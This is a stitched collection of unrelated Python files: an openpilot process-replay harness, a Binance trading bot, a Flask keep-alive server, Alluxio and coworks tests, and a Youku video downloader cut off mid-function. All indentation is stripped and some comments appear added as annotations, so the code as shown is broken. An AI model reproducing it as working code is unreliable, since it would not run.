Params().put("CarParams", CP.to_bytes())
def radar_rcv_callback(msg, CP, cfg, fsm):
if msg.which() != "can":
return [], False
elif CP.radarOffCan:
return ["radarState", "liveTracks"], True
radar_msgs = {"honda": [0x445], "toyota": [0x19f, 0x22f], "gm": [0x474],
"chrysler": [0x2d4]}.get(CP.carName, None)
if radar_msgs is None:
raise NotImplementedError
for m in msg.can:
if m.src == 1 and m.address in radar_msgs:
return ["radarState", "liveTracks"], True
return [], False
def calibration_rcv_callback(msg, CP, cfg, fsm):
# calibrationd publishes 1 calibrationData every 5 cameraOdometry packets.
# should_recv always true to increment frame
recv_socks = []
if msg.which() == 'carState' and ((fsm.frame + 1) % 25) == 0:
recv_socks = ["liveCalibration"]
return recv_socks, msg.which() == 'carState'
def paramsd_rcv_callback(msg, CP, cfg, fsm):
recv_socks = []
if msg.which() == 'carState' and ((fsm.frame + 2) % 5) == 0:
recv_socks = ["liveParameters"]
return recv_socks, msg.which() == 'carState'
CONFIGS = [
ProcessConfig(
proc_name="controlsd",
pub_sub={
"can": ["controlsState", "carState", "carControl", "sendcan", "carEvents", "carParams"],
"thermal": [], "health": [], "liveCalibration": [], "dMonitoringState": [], "plan": [], "pathPlan": [], "gpsLocation": [], "liveLocationKalman": [],
"model": [], "frame": [],
},
ignore=["logMonoTime", "valid", "controlsState.startMonoTime", "controlsState.cumLagMs"],
init_callback=fingerprint,
should_recv_callback=None,
tolerance=None,
),
ProcessConfig(
proc_name="radard",
pub_sub={
"can": ["radarState", "liveTracks"],
"liveParameters": [], "controlsState": [], "model": [],
},
ignore=["logMonoTime", "valid", "radarState.cumLagMs"],
init_callback=get_car_params,
should_recv_callback=radar_rcv_callback,
tolerance=None,
),
ProcessConfig(
proc_name="plannerd",
pub_sub={
"model": ["pathPlan"], "radarState": ["plan"],
"carState": [], "controlsState": [], "liveParameters": [],
},
ignore=["logMonoTime", "valid", "plan.processingDelay"],
init_callback=get_car_params,
should_recv_callback=None,
tolerance=None,
),
ProcessConfig(
proc_name="calibrationd",
pub_sub={
"carState": ["liveCalibration"],
"cameraOdometry": []
},
ignore=["logMonoTime", "valid"],
init_callback=get_car_params,
should_recv_callback=calibration_rcv_callback,
tolerance=None,
),
ProcessConfig(
proc_name="dmonitoringd",
pub_sub={
"driverState": ["dMonitoringState"],
"liveCalibration": [], "carState": [], "model": [], "gpsLocation": [],
},
ignore=["logMonoTime", "valid"],
init_callback=get_car_params,
should_recv_callback=None,
tolerance=NUMPY_TOLERANCE,
),
ProcessConfig(
proc_name="locationd",
pub_sub={
"cameraOdometry": ["liveLocationKalman"],
"sensorEvents": [], "gpsLocationExternal": [], "liveCalibration": [], "carState": [],
},
ignore=["logMonoTime", "valid"],
init_callback=get_car_params,
should_recv_callback=None,
tolerance=NUMPY_TOLERANCE,
),
ProcessConfig(
proc_name="paramsd",
pub_sub={
"carState": ["liveParameters"],
"liveLocationKalman": []
},
ignore=["logMonoTime", "valid"],
init_callback=get_car_params,
should_recv_callback=paramsd_rcv_callback,
tolerance=NUMPY_TOLERANCE,
),
]
def replay_process(cfg, lr):
sub_sockets = [s for _, sub in cfg.pub_sub.items() for s in sub]
pub_sockets = [s for s in cfg.pub_sub.keys() if s != 'can']
fsm = FakeSubMaster(pub_sockets)
fpm = FakePubMaster(sub_sockets)
args = (fsm, fpm)
if 'can' in list(cfg.pub_sub.keys()):
can_sock = FakeSocket()
args = (fsm, fpm, can_sock)
all_msgs = sorted(lr, key=lambda msg: msg.logMonoTime)
pub_msgs = [msg for msg in all_msgs if msg.which() in list(cfg.pub_sub.keys())]
params = Params()
params.clear_all()
params.manager_start()
params.put("OpenpilotEnabledToggle", "1")
params.put("Passive", "0")
params.put("CommunityFeaturesToggle", "1")
os.environ['NO_RADAR_SLEEP'] = "1"
manager.prepare_managed_process(cfg.proc_name)
mod = importlib.import_module(manager.managed_processes[cfg.proc_name])
thread = threading.Thread(target=mod.main, args=args)
thread.daemon = True
thread.start()
if cfg.init_callback is not None:
if 'can' not in list(cfg.pub_sub.keys()):
can_sock = None
cfg.init_callback(all_msgs, fsm, can_sock)
CP = car.CarParams.from_bytes(params.get("CarParams", block=True))
# wait for started process to be ready
if 'can' in list(cfg.pub_sub.keys()):
can_sock.wait_for_recv()
else:
fsm.wait_for_update()
log_msgs, msg_queue = [], []
for msg in tqdm(pub_msgs):
if cfg.should_recv_callback is not None:
recv_socks, should_recv = cfg.should_recv_callback(msg, CP, cfg, fsm)
else:
recv_socks = [s for s in cfg.pub_sub[msg.which()] if
(fsm.frame + 1) % int(service_list[msg.which()].frequency / service_list[s].frequency) == 0]
should_recv = bool(len(recv_socks))
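# e.g. a publisher at 100Hz paired with a 20Hz output service expects that
# output on every 5th frame (assuming the service frequencies divide evenly).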
if msg.which() == 'can':
can_sock.send(msg.as_builder().to_bytes())
else:
msg_queue.append(msg.as_builder())
if should_recv:
fsm.update_msgs(0, msg_queue)
msg_queue = []
recv_cnt = len(recv_socks)
while recv_cnt > 0:
m = fpm.wait_for_msg()
log_msgs.append(m)
recv_cnt -= m.which() in recv_socks
return log_msgs
|
Trading.py
|
# -*- coding: UTF-8 -*-
# @yasinkuyu
# Define Python imports
import os
import sys
import time
import config
import threading
import math
# Define Custom imports
from Database import Database
from Orders import Orders
class Trading():
# Define trade vars
order_id = 0
order_data = None
buy_filled = True
sell_filled = True
buy_filled_qty = 0
sell_filled_qty = 0
# percent (if the price drops this much, panic-sell)
stop_loss = 0
# Buy/Sell qty
quantity = 0
# BTC amount
amount = 0
# float(step_size * math.floor(float(free)/step_size))
step_size = 0
# Define static vars
WAIT_TIME_BUY_SELL = 1 # seconds
WAIT_TIME_CHECK_BUY_SELL = 0.2 # seconds
WAIT_TIME_CHECK_SELL = 5 # seconds
WAIT_TIME_STOP_LOSS = 20 # seconds
MAX_TRADE_SIZE = 7 # int
def __init__(self, option):
# Get argument parse options
self.option = option
# Define parser vars
self.order_id = self.option.orderid
self.quantity = self.option.quantity
self.wait_time = self.option.wait_time
self.stop_loss = self.option.stop_loss
self.increasing = self.option.increasing
self.decreasing = self.option.decreasing
# BTC amount
self.amount = self.option.amount
def buy(self, symbol, quantity, buyPrice):
# Do you have an open order?
self.check_order()
try:
# Create order
orderId = Orders.buy_limit(symbol, quantity, buyPrice)
# Database log
Database.write([orderId, symbol, 0, buyPrice, 'BUY', quantity, self.option.profit])
print('Buy order created id:%d, q:%.8f, p:%.8f' % (orderId, quantity, float(buyPrice)))
self.order_id = orderId
return orderId
except Exception as e:
print('bl: %s' % (e))
time.sleep(self.WAIT_TIME_BUY_SELL)
return None
def sell(self, symbol, quantity, orderId, sell_price, last_price):
'''
Try to sell at the specified limit price until it is reached.
If not successful, the order will be canceled.
'''
buy_order = Orders.get_order(symbol, orderId)
if buy_order['status'] == 'FILLED' and buy_order['side'] == 'BUY':
print('Buy order filled... Try sell...')
else:
time.sleep(self.WAIT_TIME_CHECK_BUY_SELL)
if buy_order['status'] == 'FILLED' and buy_order['side'] == 'BUY':
print('Buy order filled after %s seconds... Try sell...' % self.WAIT_TIME_CHECK_BUY_SELL)
elif buy_order['status'] == 'PARTIALLY_FILLED' and buy_order['side'] == 'BUY':
print('Buy order partially filled... Try sell... Cancel remaining buy...')
self.cancel(symbol, orderId)
else:
self.cancel(symbol, orderId)
print('Buy order fail (Not filled) Cancel order...')
self.order_id = 0
return
sell_order = Orders.sell_limit(symbol, quantity, sell_price)
sell_id = sell_order['orderId']
print('Sell order created id: %d' % sell_id)
time.sleep(self.WAIT_TIME_CHECK_SELL)
sell_order = Orders.get_order(symbol, sell_id)
if sell_order['status'] == 'FILLED':
print('Sell order (Filled) Id: %d' % sell_id)
print('LastPrice : %.8f' % last_price)
print('Profit: %%%s. Buy price: %.8f Sell price: %.8f' % (self.option.profit, float(sell_order['price']), sell_price))
self.order_id = 0
self.order_data = None
return
'''
If all sell attempts fail,
fall back to the stop-loss.
'''
if self.stop_loss > 0:
# If the sell order is still unfilled after 5 seconds, wait 5 more seconds before selling at a loss
time.sleep(self.WAIT_TIME_CHECK_SELL)
if self.stop(symbol, quantity, sell_id, last_price):
if Orders.get_order(symbol, sell_id)['status'] != 'FILLED':
print('We apologize... Sold at loss...')
else:
print('We apologize... Cant sell even at loss... Please sell manually... Stopping program...')
self.cancel(symbol, sell_id)
exit(1)
sell_status = Orders.get_order(symbol, sell_id)['status']
while (sell_status != 'FILLED'):
time.sleep(self.WAIT_TIME_CHECK_SELL)
sell_status = Orders.get_order(symbol, sell_id)['status']
lastPrice = Orders.get_ticker(symbol)
print('Status: %s Current price: %.8f Sell price: %.8f' % (sell_status, lastPrice, sell_price))
print('Sold! Continue trading...')
self.order_id = 0
self.order_data = None
def stop(self, symbol, quantity, orderId, last_price):
# If the target is not reached, stop-loss.
stop_order = Orders.get_order(symbol, orderId)
stopprice = self.calc(float(stop_order['price']))
lossprice = stopprice - (stopprice * self.stop_loss / 100)
status = stop_order['status']
# Order status
if status == 'NEW' or status == 'PARTIALLY_FILLED':
if self.cancel(symbol, orderId):
# Stop loss
if last_price >= lossprice:
sello = Orders.sell_market(symbol, quantity)
print('Stop-loss, sell market, %s' % (last_price))
if sello == True:
return True
else:
# Wait a while after the sale to the loss.
time.sleep(self.WAIT_TIME_STOP_LOSS)
statusloss = sello['status']
if statusloss != 'NEW':
print('Stop-loss, sold')
return True
else:
self.cancel(symbol, sello['orderId'])
return False
else:
sello = Orders.sell_limit(symbol, quantity, lossprice)
print('Stop-loss, sell limit, %s' % (lossprice))
time.sleep(self.WAIT_TIME_STOP_LOSS)
statusloss = sello['status']
if statusloss != 'NEW':
print('Stop-loss, sold')
return True
else:
self.cancel(symbol, sello['orderId'])
return False
else:
print('Cancel did not work... Might have been sold before stop loss...')
return True
elif status == 'FILLED':
self.order_id = 0
self.order_data = None
print('Order filled')
return True
else:
return False
def check(self, symbol, orderId, quantity):
# If no fill happened at the specified price, fall back to a market buy.
# Do you have an open order?
self.check_order()
trading_size = 0
time.sleep(self.WAIT_TIME_BUY_SELL)
while trading_size < self.MAX_TRADE_SIZE:
# Order info
order = Orders.get_order(symbol, orderId)
side = order['side']
price = float(order['price'])
# TODO: Sell partial qty
orig_qty = float(order['origQty'])
self.buy_filled_qty = float(order['executedQty'])
status = order['status']
print('Wait buy order: %s id:%d, price: %.8f, orig_qty: %.8f' % (symbol, order['orderId'], price, orig_qty))
if status == 'NEW':
if self.cancel(symbol, orderId):
buyo = Orders.buy_market(symbol, quantity)
print('Buy market order')
self.order_id = buyo['orderId']
self.order_data = buyo
if buyo == True:
break
else:
trading_size += 1
continue
else:
break
elif status == 'FILLED':
self.order_id = order['orderId']
self.order_data = order
print('Filled')
break
elif status == 'PARTIALLY_FILLED':
print('Partial filled')
break
else:
trading_size += 1
continue
def cancel(self, symbol, orderId):
# If order is not filled, cancel it.
check_order = Orders.get_order(symbol, orderId)
if not check_order:
self.order_id = 0
self.order_data = None
return True
if check_order['status'] != 'CANCELLED':
Orders.cancel_order(symbol, orderId)
self.order_id = 0
self.order_data = None
return True
def calc(self, lastBid):
try:
return lastBid + (lastBid * self.option.profit / 100)
except Exception as e:
print('c: %s' % (e))
return
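# Illustrative: with option.profit = 0.5 (percent), calc(100.0) returns 100.5,
# the minimum selling price that preserves the configured spread over the bid.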
def check_order(self):
# If there is an open order, exit.
if self.order_id > 0:
exit(1)
def action(self, symbol):
# Order amount
quantity = self.quantity
# Fetches the ticker price
lastPrice = Orders.get_ticker(symbol)
# Order book prices
lastBid, lastAsk = Orders.get_order_book(symbol)
# Target buy price: add a small increase (see #87)
buyPrice = lastBid + self.increasing
# Target sell price: subtract a small decrease
sellPrice = lastAsk - self.decreasing
# Spread ( profit )
profitableSellingPrice = self.calc(lastBid)
# Check working mode
if self.option.mode == 'range':
buyPrice = float(self.option.buyprice)
sellPrice = float(self.option.sellprice)
profitableSellingPrice = sellPrice
# Screen log
if self.option.prints and self.order_id == 0:
spreadPerc = (lastAsk/lastBid - 1) * 100.0
print('price:%.8f buyp:%.8f sellp:%.8f-bid:%.8f ask:%.8f spread:%.2f' % (lastPrice, buyPrice, profitableSellingPrice, lastBid, lastAsk, spreadPerc))
# analyze = threading.Thread(target=analyze, args=(symbol,))
# analyze.start()
if self.order_id > 0:
# Profit mode
if self.order_data is not None:
order = self.order_data
# Last control
newProfitableSellingPrice = self.calc(float(order['price']))
if (lastAsk >= newProfitableSellingPrice):
profitableSellingPrice = newProfitableSellingPrice
# range mode
if self.option.mode == 'range':
profitableSellingPrice = self.option.sellprice
'''
If the order is complete,
try to sell it.
'''
# Perform buy action
sellAction = threading.Thread(target=self.sell, args=(symbol, quantity, self.order_id, profitableSellingPrice, lastPrice,))
sellAction.start()
return
'''
Profit check:
if the ask price has reached the profitable selling price,
place a buy order at our buy price.
'''
if (lastAsk >= profitableSellingPrice and self.option.mode == 'profit') or \
(lastPrice <= float(self.option.buyprice) and self.option.mode == 'range'):
if self.order_id == 0:
self.buy(symbol, quantity, buyPrice)
# Perform check/sell action
# checkAction = threading.Thread(target=self.check, args=(symbol, self.order_id, quantity,))
# checkAction.start()
def logic(self):
return 0
def filters(self):
symbol = self.option.symbol
# Get symbol exchange info
symbol_info = Orders.get_info(symbol)
if not symbol_info:
print('Invalid symbol, please try again...')
exit(1)
symbol_info['filters'] = {item['filterType']: item for item in symbol_info['filters']}
return symbol_info
def format_step(self, quantity, stepSize):
return float(stepSize * math.floor(float(quantity)/stepSize))
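# Worked example (illustrative values): with a LOT_SIZE stepSize of 0.001,
# format_step(0.123456, 0.001) floors the quantity to 0.123 so the order
# size is a valid multiple of the exchange's step.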
def validate(self):
valid = True
symbol = self.option.symbol
filters = self.filters()['filters']
# Order book prices
lastBid, lastAsk = Orders.get_order_book(symbol)
lastPrice = Orders.get_ticker(symbol)
minQty = float(filters['LOT_SIZE']['minQty'])
minPrice = float(filters['PRICE_FILTER']['minPrice'])
minNotional = float(filters['MIN_NOTIONAL']['minNotional'])
quantity = float(self.option.quantity)
# stepSize defines the intervals that a quantity/icebergQty can be increased/decreased by.
stepSize = float(filters['LOT_SIZE']['stepSize'])
# tickSize defines the intervals that a price/stopPrice can be increased/decreased by
tickSize = float(filters['PRICE_FILTER']['tickSize'])
# If the increasing option is below the tickSize, use the tickSize
if (float(self.option.increasing) < tickSize):
self.increasing = tickSize
# If the decreasing option is below the tickSize, use the tickSize
if (float(self.option.decreasing) < tickSize):
self.decreasing = tickSize
# Just for validation
lastBid = lastBid + self.increasing
# Defaults
# If quantity/amount are not given, derive quantity from minNotional plus a 10% margin
quantity = (minNotional / lastBid)
quantity = quantity + (quantity * 10 / 100)
notional = minNotional
if self.amount > 0:
# Calculate amount to quantity
quantity = (self.amount / lastBid)
if self.quantity > 0:
# Format quantity step
quantity = self.quantity
quantity = self.format_step(quantity, stepSize)
notional = lastBid * float(quantity)
# Set Globals
self.quantity = quantity
self.step_size = stepSize
# minQty = minimum order quantity
if quantity < minQty:
print('Invalid quantity, minQty: %.8f (u: %.8f)' % (minQty, quantity))
valid = False
if lastPrice < minPrice:
print('Invalid price, minPrice: %.8f (u: %.8f)' % (minPrice, lastPrice))
valid = False
# minNotional = minimum order value (price * quantity)
if notional < minNotional:
print('Invalid notional, minNotional: %.8f (u: %.8f)' % (minNotional, notional))
valid = False
if not valid:
exit(1)
def run(self):
cycle = 0
actions = []
symbol = self.option.symbol
print('Auto Trading for Binance.com. @yasinkuyu')
print('\n')
# Validate symbol
self.validate()
print('Started...')
print('Trading Symbol: %s' % symbol)
print('Buy Quantity: %.8f' % self.quantity)
print('Stop-Loss Amount: %s' % self.stop_loss)
if self.option.mode == 'range':
if self.option.buyprice == 0 or self.option.sellprice == 0:
print('Please enter --buyprice / --sellprice\n')
exit(1)
print('Range Mode Options:')
print('\tBuy Price: %.8f' % self.option.buyprice)
print('\tSell Price: %.8f' % self.option.sellprice)
else:
print('Profit Mode Options:')
print('\tPreferred Profit: %0.2f%%' % self.option.profit)
print('\tBuy Price : (Bid+ --increasing %.8f)' % self.increasing)
print('\tSell Price: (Ask- --decreasing %.8f)' % self.decreasing)
print('\n')
while (cycle <= self.option.loop):
startTime = time.time()
actionTrader = threading.Thread(target=self.action, args=(symbol,))
actions.append(actionTrader)
actionTrader.start()
endTime = time.time()
if endTime - startTime < self.wait_time:
time.sleep(self.wait_time - (endTime - startTime))
# 0 = Unlimited loop
if self.option.loop > 0:
cycle = cycle + 1
|
keep_alive.py
|
from flask import Flask
from threading import Thread
app = Flask("")
@app.route("/")
def home():
return "Hello, World! I am running"
def run():
app.run(host='0.0.0.0', port=8080)
def keep_alive():
t = Thread(target=run)
t.start()
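# Illustrative usage (an assumption about the surrounding project): call
# keep_alive() before starting a long-running bot so an external uptime
# monitor can ping port 8080 and keep the host from idling.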
|
client_test.py
|
try:
from BaseHTTPServer import HTTPServer, BaseHTTPRequestHandler
except ImportError:
from http.server import HTTPServer, BaseHTTPRequestHandler
import socket
from threading import Thread
import json
import random
try:
from urllib import quote
from urlparse import urlparse
except ImportError:
from urllib.parse import quote, urlparse
import alluxio
from random_option import *
from random_wire import *
from util import random_str, random_int
def get_free_port():
s = socket.socket(socket.AF_INET, type=socket.SOCK_STREAM)
s.bind(('localhost', 0))
address, port = s.getsockname()
s.close()
return port
def setup_client(handler):
host = 'localhost'
port = get_free_port()
print(port)
server = HTTPServer((host, port), handler)
server_thread = Thread(target=server.serve_forever)
server_thread.daemon = True
server_thread.start()
client = alluxio.Client(host, port, timeout=60)
return client, lambda: server.shutdown()
def handle_paths_request(request, path, action, params=None, input=None, output=None):
# Assert that URL path is expected.
expected_path = alluxio.client._paths_url_path(path, action)
if params is not None:
expected_path += '?'
for i, (k, v) in enumerate(params.items()):
if i != 0:
expected_path += '&'
expected_path += '{}={}'.format(k, quote(v, safe=''))
assert request.path == expected_path
if input is not None:
# Assert that request body is expected.
content_len = int(request.headers.getheader('content-length', 0))
body = request.rfile.read(content_len)
assert json.loads(body) == input.json()
# Respond.
request.send_response(200)
if output is not None:
request.send_header('Content-Type', 'application/json')
request.end_headers()
request.wfile.write(json.dumps(output))
def paths_handler(path, action, params=None, input=None, output=None):
class _(BaseHTTPRequestHandler):
def do_POST(self):
handle_paths_request(self, path, action,
params=params, input=input, output=output)
return _
def test_create_directory():
path = '/foo'
option = random_create_directory()
client, cleanup = setup_client(paths_handler(
path, 'create-directory', input=option))
client.create_directory(path, option)
cleanup()
def test_create_file():
path = '/foo'
option = random_create_file()
expected_file_id = 1
client, cleanup = setup_client(paths_handler(
path, 'create-file', input=option, output=expected_file_id))
file_id = client.create_file(path, option)
cleanup()
assert file_id == expected_file_id
def test_delete():
path = '/foo'
option = random_delete()
client, cleanup = setup_client(paths_handler(path, 'delete', input=option))
client.delete(path, option)
cleanup()
def test_exists():
path = '/foo'
expected_output = True
client, cleanup = setup_client(paths_handler(
path, 'exists', output=expected_output))
output = client.exists(path)
cleanup()
assert output == expected_output
def test_free():
path = '/foo'
option = random_free()
client, cleanup = setup_client(paths_handler(path, 'free', input=option))
client.free(path, option)
cleanup()
def test_get_status():
path = '/foo'
expected_output = random_file_info()
client, cleanup = setup_client(paths_handler(
path, 'get-status', output=expected_output.json()))
output = client.get_status(path)
cleanup()
assert output == expected_output
def test_list_status():
path = '/foo'
option = random_list_status()
expected_file_infos = []
for _ in range(random.randint(1, 10)):
expected_file_infos.append(random_file_info())
expected_output = [info.json() for info in expected_file_infos]
expected_names = [info.name for info in expected_file_infos]
client, cleanup = setup_client(paths_handler(
path, 'list-status', input=option, output=expected_output))
infos = client.list_status(path, option)
names = client.ls(path, option)
cleanup()
expected_file_infos.sort()
assert infos == expected_file_infos
expected_names.sort()
assert names == expected_names
def test_mount():
path = '/foo'
src = random_str()
option = random_mount()
client, cleanup = setup_client(paths_handler(
path, 'mount', params={'src': src}, input=option))
client.mount(path, src, option)
cleanup()
def test_open_file():
path = '/foo'
expected_file_id = random_int()
option = random_open_file()
client, cleanup = setup_client(paths_handler(
path, 'open-file', input=option, output=expected_file_id))
file_id = client.open_file(path, option)
cleanup()
assert file_id == expected_file_id
def test_rename():
src = '/foo'
dst = '/bar'
client, cleanup = setup_client(
paths_handler(src, 'rename', params={'dst': dst}))
client.rename(src, dst)
cleanup()
def test_set_attribute():
option = random_set_attribute()
path = '/foo'
client, cleanup = setup_client(
paths_handler(path, 'set-attribute', input=option))
client.set_attribute(path, option)
cleanup()
def test_unmount():
path = '/foo'
client, cleanup = setup_client(paths_handler(path, 'unmount'))
client.unmount(path)
cleanup()
def handle_streams_request(request, file_id, action, input=None, output=None):
# Assert that URL path is expected.
expected_path = alluxio.client._streams_url_path(file_id, action)
assert request.path == expected_path
content_len = 0
if input is not None:
# Assert that request body is expected.
content_len = int(request.headers.getheader('content-length', 0))
body = request.rfile.read(content_len)
assert body == input
# Respond.
request.send_response(200)
if output is not None:
request.send_header('Content-Type', 'application/octet-stream')
request.end_headers()
request.wfile.write(output)
else:
request.send_header('Content-Type', 'application/json')
request.end_headers()
request.wfile.write(json.dumps(content_len))
def streams_handler(file_id, action, input=None, output=None):
class _(BaseHTTPRequestHandler):
def do_POST(self):
handle_streams_request(self, file_id, action,
input=input, output=output)
return _
def test_close():
file_id = random_int()
client, cleanup = setup_client(streams_handler(file_id, 'close'))
client.close(file_id)
cleanup()
def test_read():
file_id = random_int()
message = random_str()
client, cleanup = setup_client(
streams_handler(file_id, 'read', output=message))
reader = client.read(file_id)
got = reader.read()
reader.close()
assert got == message
def test_write():
file_id = random_int()
message = random_str()
client, cleanup = setup_client(
streams_handler(file_id, 'write', input=message))
writer = client.write(file_id)
length = writer.write(message)
writer.close()
assert length == len(message)
def combined_handler(path, path_action, file_id, stream_action, path_input=None, path_output=None, stream_input=None, stream_output=None):
class _(BaseHTTPRequestHandler):
def do_POST(self):
request_path = urlparse(self.path).path
paths_path = alluxio.client._paths_url_path(path, path_action)
streams_path = alluxio.client._streams_url_path(
file_id, stream_action)
close_path = alluxio.client._streams_url_path(file_id, 'close')
if request_path == paths_path:
handle_paths_request(
self, path, path_action, input=path_input, output=path_output)
elif request_path == streams_path:
handle_streams_request(
self, file_id, stream_action, input=stream_input, output=stream_output)
elif request_path == close_path:
self.send_response(200)
return _
def test_open_read():
path = '/foo'
file_id = random_int()
message = random_str()
handler = combined_handler(
path, 'open-file', file_id, 'read', path_output=file_id, stream_output=message)
client, cleanup = setup_client(handler)
got = None
with client.open(path, 'r') as f:
got = f.read()
cleanup()
assert got == message
def test_open_write():
path = '/foo'
file_id = random_int()
message = random_str()
handler = combined_handler(path, 'create-file', file_id, 'write',
path_output=file_id, stream_input=message, stream_output=len(message))
client, cleanup = setup_client(handler)
written_len = None
with client.open(path, 'w') as f:
written_len = f.write(message)
cleanup()
assert written_len == len(message)
|
test_simple.py
|
import multiprocessing
import os
import time
from unittest import mock
import requests
from coworks.utils import import_attr
class TestClass:
@mock.patch.dict(os.environ, {"WORKSPACE": "local"})
@mock.patch.dict(os.environ, {"FLASK_RUN_FROM_CLI": "false"})
def test_run_simple(self, samples_docs_dir, unused_tcp_port):
app = import_attr('simple', 'app', cwd=samples_docs_dir)
server = multiprocessing.Process(target=run_server, args=(app, unused_tcp_port), daemon=True)
server.start()
counter = 1
time.sleep(counter)
while not server.is_alive() and counter < 3:
time.sleep(counter)
counter += 1
response = requests.get(f'http://localhost:{unused_tcp_port}/', headers={'Authorization': "token"})
assert response.text == "Hello world.\n"
server.terminate()
def run_server(app, port):
print(f"Server starting on port {port}")
app.run(host='localhost', port=port, use_reloader=False, debug=False)
|
youku.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
__all__ = ['youku_download', 'youku_download_playlist', 'youku_download_by_id']
from ..common import *
import json
import os
import re
import sys
import threading
from random import randint
from time import time
# os and threading are used below (Sogou proxy path); imported explicitly in
# case the star-import from ..common does not provide them.
def trim_title(title):
title = title.replace(' - 视频 - 优酷视频 - 在线观看', '')
title = title.replace(' - 专辑 - 优酷视频', '')
title = re.sub(r'—([^—]+)—优酷网,视频高清在线观看', '', title)
return title
def find_video_id_from_url(url):
patterns = [r'^http://v.youku.com/v_show/id_([\w=]+).html',
r'^http://player.youku.com/player.php/sid/([\w=]+)/v.swf',
r'^loader\.swf\?VideoIDS=([\w=]+)',
r'^([\w=]+)$']
return r1_of(patterns, url)
def find_video_id_from_show_page(url):
return re.search(r'<a class="btnShow btnplay.*href="([^"]+)"', get_html(url)).group(1)
def youku_url(url):
id = find_video_id_from_url(url)
if id:
return 'http://v.youku.com/v_show/id_%s.html' % id
if re.match(r'http://www.youku.com/show_page/id_\w+.html', url):
return find_video_id_from_show_page(url)
if re.match(r'http://v.youku.com/v_playlist/\w+.html', url):
return url
return None
def parse_video_title(url, page):
if re.search(r'v_playlist', url):
# if we are playing a video from a playlist, the meta title might be incorrect
title = r1_of([r'<div class="show_title" title="([^"]+)">[^<]', r'<title>([^<>]*)</title>'], page)
else:
title = r1_of([r'<div class="show_title" title="([^"]+)">[^<]', r'<meta name="title" content="([^"]*)"'], page)
assert title
title = trim_title(title)
if re.search(r'v_playlist', url) and re.search(r'-.*\S+', title):
title = re.sub(r'^[^-]+-\s*', '', title) # remove the special name from title for playlist video
title = re.sub(r'—专辑:.*', '', title) # remove the special name from title for playlist video
title = unescape_html(title)
subtitle = re.search(r'<span class="subtitle" id="subtitle">([^<>]*)</span>', page)
if subtitle:
subtitle = subtitle.group(1).strip()
if subtitle == title:
subtitle = None
if subtitle:
title += '-' + subtitle
return title
def parse_playlist_title(url, page):
if re.search(r'v_playlist', url):
# if we are playing a video from a playlist, the meta title might be incorrect
title = re.search(r'<title>([^<>]*)</title>', page).group(1)
else:
title = re.search(r'<meta name="title" content="([^"]*)"', page).group(1)
title = trim_title(title)
if re.search(r'v_playlist', url) and re.search(r'-.*\S+', title):
title = re.sub(r'^[^-]+-\s*', '', title)
title = re.sub(r'^.*—专辑:《(.+)》', r'\1', title)
title = unescape_html(title)
return title
def parse_page(url):
url = youku_url(url)
page = get_html(url)
id2 = re.search(r"var\s+videoId2\s*=\s*'(\S+)'", page).group(1)
title = parse_video_title(url, page)
return id2, title
def get_info(videoId2):
return json.loads(get_html('http://v.youku.com/player/getPlayList/VideoIDS/' + videoId2 + '/timezone/+08/version/5/source/out/Sc/2'))
def find_video(info, stream_type = None):
#key = '%s%x' % (info['data'][0]['key2'], int(info['data'][0]['key1'], 16) ^ 0xA55AA5A5)
segs = info['data'][0]['segs']
types = segs.keys()
if not stream_type:
for x in ['hd2', 'mp4', 'flv']:
if x in types:
stream_type = x
break
else:
raise NotImplementedError()
assert stream_type in ('hd2', 'mp4', 'flv')
file_type = {'hd2': 'flv', 'mp4': 'mp4', 'flv': 'flv'}[stream_type]
seed = info['data'][0]['seed']
source = list("abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ/\\:._-1234567890")
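# The loop below is a small linear-congruential shuffle: the server-provided
# seed deterministically permutes the character table, and streamfileids are
# indices into that permutation.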
mixed = ''
while source:
seed = (seed * 211 + 30031) & 0xFFFF
index = seed * len(source) >> 16
c = source.pop(index)
mixed += c
ids = info['data'][0]['streamfileids'][stream_type].split('*')[:-1]
vid = ''.join(mixed[int(i)] for i in ids)
sid = '%s%s%s' % (int(time() * 1000), randint(1000, 1999), randint(1000, 9999))
urls = []
for s in segs[stream_type]:
no = '%02x' % int(s['no'])
url = 'http://f.youku.com/player/getFlvPath/sid/%s_%s/st/%s/fileid/%s%s%s?K=%s&ts=%s' % (sid, no, file_type, vid[:8], no.upper(), vid[10:], s['k'], s['seconds'])
urls.append((url, int(s['size'])))
return urls
def file_type_of_url(url):
return str(re.search(r'/st/([^/]+)/', url).group(1))
def youku_download_by_id(id, title, output_dir = '.', stream_type = None, merge = True, info_only = False):
# Open Sogou proxy if required
if get_sogou_proxy() is not None:
server = sogou_proxy_server(get_sogou_proxy(), ostream=open(os.devnull, 'w'))
server_thread = threading.Thread(target=server.serve_forever)
server_thread.daemon = True
server_thread.start()
set_proxy(server.server_address)
info = get_info(id)
# Close Sogou proxy if required
if get_sogou_proxy() is not None:
server.shutdown()
unset_proxy()
urls, sizes = zip(*find_video(info, stream_type))
ext = file_type_of_url(urls[0])
total_size = sum(sizes)
print_info(site_info, title, ext, total_size)
if not info_only:
download_urls(urls, title, ext, total_size, output_dir, merge = merge)
def parse_playlist_videos(html):
return re.findall(r'id="A_(\w+)"', html)
def parse_playlist_pages(html):
m = re.search(r'<ul class="pages">.*?</ul>', html, flags = re.S)
if m:
urls = re.findall(r'href="([^"]+)"', m.group())
x1, x2, x3 = re.match(r'^(.*page_)(\d+)(_.*)$', urls[-1]).groups()
return ['http://v.youku.com%s%s%s?__rt=1&__ro=listShow' % (x1, i, x3) for i in range(2, int(x2) + 1)]
else:
return []
def parse_playlist(url):
html = get_html(url)
video_id = re.search(r"var\s+videoId\s*=\s*'(\d+)'", html).group(1)
show_id = re.search(r'var\s+showid\s*=\s*"(\d+)"', html).group(1)
list_url = 'http://v.youku.com/v_vpofficiallist/page_1_showid_%s_id_%s.html?__rt=1&__ro=listShow' % (show_id, video_id)
html = get_html(list_url)
ids = parse_playlist_videos(html)
for url in parse_playlist_pages(html):
ids.extend(parse_playlist_videos(get_html(url)))
return ids
def parse_vplaylist(url):
id = r1_of([r'^http://www.youku.com/playlist_show/id_(\d+)(?:_ascending_\d_mode_pic(?:_page_\d+)?)?.html',
r'^http://v.youku.com/v_playlist/f(\d+)o[01]p\d+.html',
r'^http://u.youku.com/user_playlist/pid_(\d+)_id_[\w=]+(?:_page_\d+)?.html'],
url)
assert id, 'not valid vplaylist url: ' + url
url = 'http://www.youku.com/playlist_show/id_%s.html' % id
n = int(re.search(r'<span class="num">(\d+)</span>', get_html(url)).group(1))
